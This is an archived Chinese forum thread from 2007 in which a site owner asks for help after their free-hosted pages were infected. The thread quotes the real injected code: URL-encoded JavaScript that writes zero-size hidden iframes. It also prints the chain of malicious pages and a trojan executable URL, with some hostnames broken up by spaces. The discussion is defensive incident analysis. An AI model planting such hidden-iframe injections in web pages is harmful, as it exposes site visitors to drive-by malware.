广场 › 『免费资源 Free Hosting Discussion』 › 各位看看这是不是马呀?怎么解决?

龙韵文化 发表于 2007 年 3 月 5 日 09:55:17

各位看看这是不是马呀?怎么解决?

后辍为.htm .html .asp .php .js的好多文件都被挂马了.我现在不知道是什么原因造成的.可能空间被上传了木马.下面的是被挂的代码,谁可以帮忙? 先把下面的html编码转换成文字看看都调用了哪个网站的马了!

<SCRIPT>var Words="%3Chtml%3E%3Ciframe src%3D%22http%3A%2F%2Fkmx%2Ezlfjj%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))</SCRIPT> <SCRIPT>var Words="%3Chtml%3E%3Ciframe src%3D%22http%3A%2F%2Fkmx%2Ezlfjj%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))</SCRIPT>

龙韵文化 发表于 2007 年 3 月 5 日 09:58:02

<SCRIPT>var Words="<html><iframe src="http://kmx.zlfjj.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>


";document.write(unescape(Words))</SCRIPT> <SCRIPT>var Words="<html><iframe src="http://kmx.zlfjj.com/index.htm" name="zhu" width="0" height="0" frameborder="0"></html>


";document.write(unescape(Words))</SCRIPT>

龙韵文化 发表于 2007 年 3 月 5 日 09:58:24

转换后就是上面的内容

hfhfg 发表于 2007 年 3 月 5 日 10:03:31

原帖由 龙韵文化 于 2007-3-5 09:58 发表
<SCRIPT>var Words="<html><iframe src="http://kmx.zlfjj.com/index.htm" name="zhu" width="0" height="0" frameborder="0">< ...
name="zhu" :L :L

龙韵文化 发表于 2007 年 3 月 5 日 10:09:39

这就是我那免费空间被挂马,管理员找到的代码!怎么解决?

2072 发表于 2007 年 3 月 5 日 10:19:31

我要是没看错，这是教主的网页木马

龙韵文化 发表于 2007 年 3 月 5 日 10:26:47

原帖由 2072 于 2007-3-5 10:19 发表
我要是没看错，这是教主的网页木马
杂解决?








.

2072 发表于 2007 年 3 月 5 日 10:27:56

http://kmx.zlfj   j.com/index.htm

这个页面的代码，晕死，还搞了个统计




<iframe src="http://kmx.zlfj   j.com/d.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://kmx.zlfj    j.com/w.htm" width="0" height="0"
<iframe src="http://www.menghx    y.com/index.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://ck10.chinaln.      net/qq.htm" width="0" height="0" frameborder="0"></iframe>
<script language="javascript" src="http://count2   9.51yes.com/click.aspx?id=291787664&logo=11"></script>
<iframe src="http://www.zlfj   j.com/1      23.htm" width="0" height="0" frameborder="0"></iframe>

继续分解了 “http://kmx.zlfjj.com/                d.htm”



找到木马之一，其余不分解了，一点技术含量都没有:lol :lol
http://kmx   .zl   fjj.com/      d.exe

chungwoo 发表于 2007 年 3 月 5 日 10:29:59

谁是教主?

有JJ没有?:@

2072 发表于 2007 年 3 月 5 日 10:30:57

很可能是蠕虫类病毒传播感染的，你要不是主机管理员是做不了什么

其实俺不是很懂啦，刚才是吹点了

我对本机还凑合，对服务器行

查看完整版本: 各位看看这是不是马呀?怎么解决?